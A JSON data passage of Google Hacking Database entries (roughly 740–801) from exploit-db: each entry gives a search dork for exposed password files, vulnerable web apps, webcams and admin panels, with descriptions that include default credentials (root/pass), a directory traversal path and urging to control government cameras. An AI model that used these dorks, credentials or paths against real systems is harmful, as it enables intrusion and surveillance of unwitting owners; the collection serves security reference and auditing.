"querystring": "http://www.google.com/search?q=ext:vmdk+vmdk&num=100&filter=0", "shortDescription": "ext:vmdk vmdk", "textualDescription": "VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything." }, { "signatureReferenceNumber": "741", "link": "https://www.exploit-db.com/ghdb/741/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:vmx+vmx&num=100&filter=0", "shortDescription": "ext:vmx vmx", "textualDescription": "VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings." }, { "signatureReferenceNumber": "742", "link": "https://www.exploit-db.com/ghdb/742/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Afilezilla.xml+-cvs", "shortDescription": "inurl:filezilla.xml -cvs", "textualDescription": "filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla." }, { "signatureReferenceNumber": "743", "link": "https://www.exploit-db.com/ghdb/743/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&q=+%2B%22Powered+by+phpBB+2.0.6..10%22+-phpbb.com+-phpbb.pl", "shortDescription": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "textualDescription": "phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal." }, { "signatureReferenceNumber": "744", "link": "https://www.exploit-db.com/ghdb/744/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&q=%22Copyright+%28c%29+Tektronix%2C+Inc.%22+%22printer+status%22", "shortDescription": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "textualDescription": "Captain, the Phasers are online :)" }, { "signatureReferenceNumber": "745", "link": "https://www.exploit-db.com/ghdb/745/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&q=intext%3A%22MaiLinX+Alert+%28Notify%29%22+-site%3Anetworkprinters.com", "shortDescription": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "textualDescription": "Xerox DocuPrint printer models." }, { "signatureReferenceNumber": "746", "link": "https://www.exploit-db.com/ghdb/746/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=inurl%3A%22printer%2Fmain.html%22+intext%3A%22settings%22&btnG=Search", "shortDescription": "inurl:\"printer/main.html\" intext:\"settings\"", "textualDescription": "Brother HL Printers." }, { "signatureReferenceNumber": "747", "link": "https://www.exploit-db.com/ghdb/747/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22sitescope.html%22+intitle%3A%22sitescope%22+intext%3A%22refresh%22+-demo&btnG=Google+Search", "shortDescription": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "textualDescription": "Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted." }, { "signatureReferenceNumber": "748", "link": "https://www.exploit-db.com/ghdb/748/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=axis+storpoint+%22file+view%22+inurl%3A%2Fvolumes%2F", "shortDescription": "axis storpoint \"file view\" inurl:/volumes/", "textualDescription": "The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF." }, { "signatureReferenceNumber": "749", "link": "https://www.exploit-db.com/ghdb/749/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22%2Faxs%2Fax-admin.pl%22+-script", "shortDescription": "inurl:\"/axs/ax-admin.pl\" -script", "textualDescription": "This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats." }, { "signatureReferenceNumber": "750", "link": "https://www.exploit-db.com/ghdb/750/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=%22Generated+by+phpSystem%22", "shortDescription": "\"Generated by phpSystem\"", "textualDescription": "PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts." }, { "signatureReferenceNumber": "751", "link": "https://www.exploit-db.com/ghdb/751/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=php-addressbook++%22This+is+the+addressbook+for+*%22+-warning", "shortDescription": "php-addressbook \"This is the addressbook for *\" -warning", "textualDescription": "php-addressbook shows user address information without a password." }, { "signatureReferenceNumber": "752", "link": "https://www.exploit-db.com/ghdb/752/", "category": "Files containing juicy info", "querystring": "http://www.google.nl/search?num=100&q=intitle%3A%22Multimon+UPS+status+page%22", "shortDescription": "intitle:\"Multimon UPS status page\"", "textualDescription": "Multimon provide UPS monitoring services" }, { "signatureReferenceNumber": "753", "link": "https://www.exploit-db.com/ghdb/753/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Mail+Server+CMailServer+Webmail%22+%225.2%22", "shortDescription": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "textualDescription": "CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html" }, { "signatureReferenceNumber": "754", "link": "https://www.exploit-db.com/ghdb/754/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22index+of%22+%22parent+directory%22+%22desktop.ini%22+site%3Adyndns.org&btnG=Google+Search", "shortDescription": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "textualDescription": "This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents." }, { "signatureReferenceNumber": "755", "link": "https://www.exploit-db.com/ghdb/755/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Live+NetSnap+Cam-Server+feed%22", "shortDescription": "intitle:\"Live NetSnap Cam-Server feed\"", "textualDescription": "Netsnap Online Cameras" }, { "signatureReferenceNumber": "756", "link": "https://www.exploit-db.com/ghdb/756/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22V-Gear+BEE%22", "shortDescription": "intitle:\"V-Gear BEE\"", "textualDescription": "V-Gear Bee Web Cameras" }, { "signatureReferenceNumber": "757", "link": "https://www.exploit-db.com/ghdb/757/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22AudioReQuest.web.server%22", "shortDescription": "intitle:\"AudioReQuest.web.server\"", "textualDescription": "Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!" }, { "signatureReferenceNumber": "758", "link": "https://www.exploit-db.com/ghdb/758/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=filetype%3Aphp+inurl%3Aipinfo.php+%22Distributed+Intrusion+Detection+System%22", "shortDescription": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "textualDescription": "Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form." }, { "signatureReferenceNumber": "759", "link": "https://www.exploit-db.com/ghdb/759/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=ext:cfg+radius.cfg&hl=en&lr=&filter=0", "shortDescription": "ext:cfg radius.cfg", "textualDescription": "\"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods\"This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc." }, { "signatureReferenceNumber": "760", "link": "https://www.exploit-db.com/ghdb/760/", "category": "Pages containing login portals", "querystring": "http://www.google.nl/search?num=100&hl=nl&newwindow=1&c2coff=1&q=intitle%3A%22VitalQIP+IP+Management", "shortDescription": "intitle:\"VitalQIP IP Management System\"", "textualDescription": "The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html" }, { "signatureReferenceNumber": "761", "link": "https://www.exploit-db.com/ghdb/761/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:%22powered+by+Web+Wiz+Journal%22&hl=en&lr=&c2coff=1&start=10&sa=N", "shortDescription": "intext:\"powered by Web Wiz Journal\"", "textualDescription": "Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html" }, { "signatureReferenceNumber": "762", "link": "https://www.exploit-db.com/ghdb/762/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22vhost%22+intext%3A%22vHost+.+2000-2004%22&btnG=Search", "shortDescription": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "textualDescription": "vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks." }, { "signatureReferenceNumber": "763", "link": "https://www.exploit-db.com/ghdb/763/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=intitle%3A%22start.managing.the.device%22+remote+pbx+access+&sourceid", "shortDescription": "intitle:\"start.managing.the.device\" remote pbx acc", "textualDescription": "MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)" }, { "signatureReferenceNumber": "764", "link": "https://www.exploit-db.com/ghdb/764/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&c2coff=1&q=allintext%3A%22Powered+by+LionMax+Software%22+%22WWW+File+Share%22&btnG=Zoeken&lr=", "shortDescription": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "textualDescription": "WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously" }, { "signatureReferenceNumber": "765", "link": "https://www.exploit-db.com/ghdb/765/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=inurl%3A%22%3A631%2Fprinters%22+-php+-demo&btnG=Search", "shortDescription": "inurl:\":631/printers\" -php -demo", "textualDescription": "CUPS provides a portable printing layer for UNIX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (\"IPP\") as the basis for managing print jobs and queues. The Line Printer Daemon (\"LPD\") Server Message Block (\"SMB\"), and AppSocket (a.k.a. JetDirect)." }, { "signatureReferenceNumber": "766", "link": "https://www.exploit-db.com/ghdb/766/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:dat+bpk.dat&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "ext:dat bpk.dat", "textualDescription": "Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version." }, { "signatureReferenceNumber": "767", "link": "https://www.exploit-db.com/ghdb/767/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22iVISTA.Main.Page%22&sourceid=firefox&start=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "intitle:\"iVISTA.Main.Page\"", "textualDescription": "And again another webcam search. MOst of these cams seem to be security cams" }, { "signatureReferenceNumber": "768", "link": "https://www.exploit-db.com/ghdb/768/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3A2506%2Fjana-admin+&btnG=Search", "shortDescription": "inurl:2506/jana-admin", "textualDescription": "The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter." }, { "signatureReferenceNumber": "769", "link": "https://www.exploit-db.com/ghdb/769/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22Spam+Firewall%22+inurl%3A%228000%2Fcgi-bin%2Findex.cgi%22&btnG=Search", "shortDescription": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "textualDescription": "The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization." }, { "signatureReferenceNumber": "770", "link": "https://www.exploit-db.com/ghdb/770/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3Ads.py&btnG=Search", "shortDescription": "inurl:ds.py", "textualDescription": "Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk" }, { "signatureReferenceNumber": "771", "link": "https://www.exploit-db.com/ghdb/771/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%221220%2Fparse_xml%22", "shortDescription": "inurl:\"1220/parse_xml.cgi?\"", "textualDescription": "Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not." }, { "signatureReferenceNumber": "772", "link": "https://www.exploit-db.com/ghdb/772/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=intitle%3A%22MX+Control+Console%22+%22If+you+can%27t+remember%22&btnG=Search", "shortDescription": "intitle:\"MX Control Console\" \"If you can't remember\"", "textualDescription": "MX Logic\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies." }, { "signatureReferenceNumber": "773", "link": "https://www.exploit-db.com/ghdb/773/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=intext%3A%22Welcome+to+the+Web+V.Networks%22+intitle%3A%22V.Networks+%5BTop%5D%22+-filetype%3Ahtm+", "shortDescription": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "textualDescription": "see and control JVC webcameras, you can move the camera, zoom... change the settings, etc...." }, { "signatureReferenceNumber": "774", "link": "https://www.exploit-db.com/ghdb/774/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22WebLogic+Server%22+intitle:%22Console+Login%22+inurl:console", "shortDescription": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "textualDescription": "BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business." }, { "signatureReferenceNumber": "775", "link": "https://www.exploit-db.com/ghdb/775/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:conf+inurl:rsyncd.conf+-cvs+-man&hl=en&lr=&filter=0", "shortDescription": "ext:conf inurl:rsyncd.conf -cvs -man", "textualDescription": "rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to \"rsync servers\" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths" }, { "signatureReferenceNumber": "776", "link": "https://www.exploit-db.com/ghdb/776/", "category": "Footholds", "querystring": "http://www.google.com/search?q=inurl%3A%22phpOracleAdmin%2Fphp%22+-download+-cvs", "shortDescription": "inurl:\"phpOracleAdmin/php\" -download -cvs", "textualDescription": "phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected." }, { "signatureReferenceNumber": "777", "link": "https://www.exploit-db.com/ghdb/777/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A1810+%22Oracle+Enterprise+Manager%22", "shortDescription": "inurl:1810 \"Oracle Enterprise Manager\"", "textualDescription": "Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box." }, { "signatureReferenceNumber": "778", "link": "https://www.exploit-db.com/ghdb/778/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%22Powered+by+Invision+Power+File+Manager%22+%28inurl%3Alogin.php%29+%7C+%28intitle%3A%22Browsing+directory+%2F%22+%29+&btnG=Search", "shortDescription": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "textualDescription": "Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser." }, { "signatureReferenceNumber": "779", "link": "https://www.exploit-db.com/ghdb/779/", "category": "Pages containing login portals", "querystring": "http://www.google.com.my/search?q=intitle%3A%22Novell+Web+Services%22+intext%3A%22Select+a+service+and+a+language.%22&btnG=Search", "shortDescription": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "textualDescription": "\"Novell\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWare\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, Linux, Windows, or any combination of these operating systems.\"" }, { "signatureReferenceNumber": "780", "link": "https://www.exploit-db.com/ghdb/780/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=ext:php+intext:%22Powered+by+phpNewMan+Version%22+", "shortDescription": "ext:php intext:\"Powered by phpNewMan Version\"", "textualDescription": "PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. path/to/news/browse.php?clang=../../../../../../file/i/want" }, { "signatureReferenceNumber": "781", "link": "https://www.exploit-db.com/ghdb/781/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Cayman-DSL.home%22&btnG=Search", "shortDescription": "intitle:\"Cayman-DSL.home\"", "textualDescription": "Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch." }, { "signatureReferenceNumber": "782", "link": "https://www.exploit-db.com/ghdb/782/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3A%22Index+of+%2FCFIDE%2F%22+administrator&btnG=Search", "shortDescription": "intitle:\"Index of /CFIDE/\" administrator", "textualDescription": "With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen" }, { "signatureReferenceNumber": "783", "link": "https://www.exploit-db.com/ghdb/783/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22Athens+Authentication+Point%22&btnG=Search", "shortDescription": "intitle:\"Athens Authentication Point\"", "textualDescription": "Athens is an Access Management system for controlling access to web based subscription services. It offers: * secure single username access to multiple web-based access controlled services * devolved administration facilities at organisation level * remote access user accounts * encrypted account bulk upload facilities * scalable services with 3 million accounts * replication facilities at several separate physical locations, offering a resilient authentication service" }, { "signatureReferenceNumber": "784", "link": "https://www.exploit-db.com/ghdb/784/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:ini+eudora.ini&hl=en&lr=&filter=0", "shortDescription": "ext:ini eudora.ini", "textualDescription": "Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes." }, { "signatureReferenceNumber": "785", "link": "https://www.exploit-db.com/ghdb/785/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Apreferences.ini+%22%5Bemule%5D%22", "shortDescription": "inurl:preferences.ini \"[emule]\"", "textualDescription": "This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored." }, { "signatureReferenceNumber": "786", "link": "https://www.exploit-db.com/ghdb/786/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+abyss.conf", "shortDescription": "intitle:index.of abyss.conf", "textualDescription": "These directories reveal the configuration file of the abyss webserver. These files can contain passwords." }, { "signatureReferenceNumber": "787", "link": "https://www.exploit-db.com/ghdb/787/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3ALogin+intext%3A%22RT+is+%C2%A9+Copyright%22&btnG=Search", "shortDescription": "intitle:Login intext:\"RT is \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Copyright\"", "textualDescription": "RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509" }, { "signatureReferenceNumber": "788", "link": "https://www.exploit-db.com/ghdb/788/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?&q=intext%3A%22%22BiTBOARD+v2.0%22+BiTSHiFTERS+Bulletin+Board%22", "shortDescription": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "textualDescription": "The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat" }, { "signatureReferenceNumber": "789", "link": "https://www.exploit-db.com/ghdb/789/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle%3A%22welcome.to.squeezebox%22+", "shortDescription": "intitle:\"welcome.to.squeezebox\"", "textualDescription": "squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool." }, { "signatureReferenceNumber": "790", "link": "https://www.exploit-db.com/ghdb/790/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&q=allinurl%3A%22%2F*%2F_vti_pvt%2F%22+%7C+allinurl%3A%22%2F*%2F_vti_cnf%2F%22", "shortDescription": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "textualDescription": "Frontpage extensions for Unix ? So be it.." }, { "signatureReferenceNumber": "791", "link": "https://www.exploit-db.com/ghdb/791/", "category": "Various Online Devices", "querystring": null, "shortDescription": null, "textualDescription": "some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):site:com inurl:axis video server manualsCan you say default UID and PW?What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). There is much to see and most of the cameras have easy acccess to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it." }, { "signatureReferenceNumber": "792", "link": "https://www.exploit-db.com/ghdb/792/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=filetype%3Acnf+inurl%3A_vti_pvt+access.cnf", "shortDescription": "filetype:cnf inurl:_vti_pvt access.cnf", "textualDescription": "The access.cnf file is a \"weconfigfile\" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it." }, { "signatureReferenceNumber": "793", "link": "https://www.exploit-db.com/ghdb/793/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3A%22install%2Finstall.php%22", "shortDescription": "inurl:\"install/install.php\"", "textualDescription": "This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info." }, { "signatureReferenceNumber": "794", "link": "https://www.exploit-db.com/ghdb/794/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3A%22index+of%22+inurl%3Aftp+%28pub+%7C+incoming%29", "shortDescription": "intitle:\"index of\" inurl:ftp (pub | incoming)", "textualDescription": "Adding \"inurl:ftp (pub | incoming)\" to the \"index.of\" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords." }, { "signatureReferenceNumber": "795", "link": "https://www.exploit-db.com/ghdb/795/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&q=filetype%3Ablt+%22buddylist%22", "shortDescription": "filetype:blt \"buddylist\"", "textualDescription": "AIM buddylists." }, { "signatureReferenceNumber": "796", "link": "https://www.exploit-db.com/ghdb/796/", "category": "Files containing juicy info", "querystring": "hxxp://www.google.com/search?q=intitle%3A%22index.of%22+.diz+.nfo+last+modified", "shortDescription": "intitle:\"index.of\" .diz .nfo last modified", "textualDescription": "File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distroubtion site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives." }, { "signatureReferenceNumber": "797", "link": "https://www.exploit-db.com/ghdb/797/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Sipura.SPA.Configuration%22+-.pdf&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "textualDescription": "Query returns configuration pages for online Voice over IP devices. Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system." }, { "signatureReferenceNumber": "798", "link": "https://www.exploit-db.com/ghdb/798/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Azureus+%3A+Java+BitTorrent+Client+Tracker%22&btnG=Google+Search", "shortDescription": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "textualDescription": "This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)" }, { "signatureReferenceNumber": "799", "link": "https://www.exploit-db.com/ghdb/799/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22BNBT+Tracker+Info%22&btnG=Google+Search", "shortDescription": "intitle:\"BNBT Tracker Info\"", "textualDescription": "This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being \"tracked\", the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!" }, { "signatureReferenceNumber": "800", "link": "https://www.exploit-db.com/ghdb/800/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22PHPBTTracker+Statistics%22+%7C+intitle%3A%22PHPBT+Tracker+Statistics%22&btnG=Google+Search", "shortDescription": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "textualDescription": "This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being \"tracked\".This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is." }, { "signatureReferenceNumber": "801", "link": "https://www.exploit-db.com/ghdb/801/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+WordPress%22+-html+filetype%3Aphp+-demo+-wordpress.org+-bugtraq&btnG=Google+Search", "shortDescription": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "textualDescription": "Query: \"Powered by WordPress\" -html filetype:php -demo 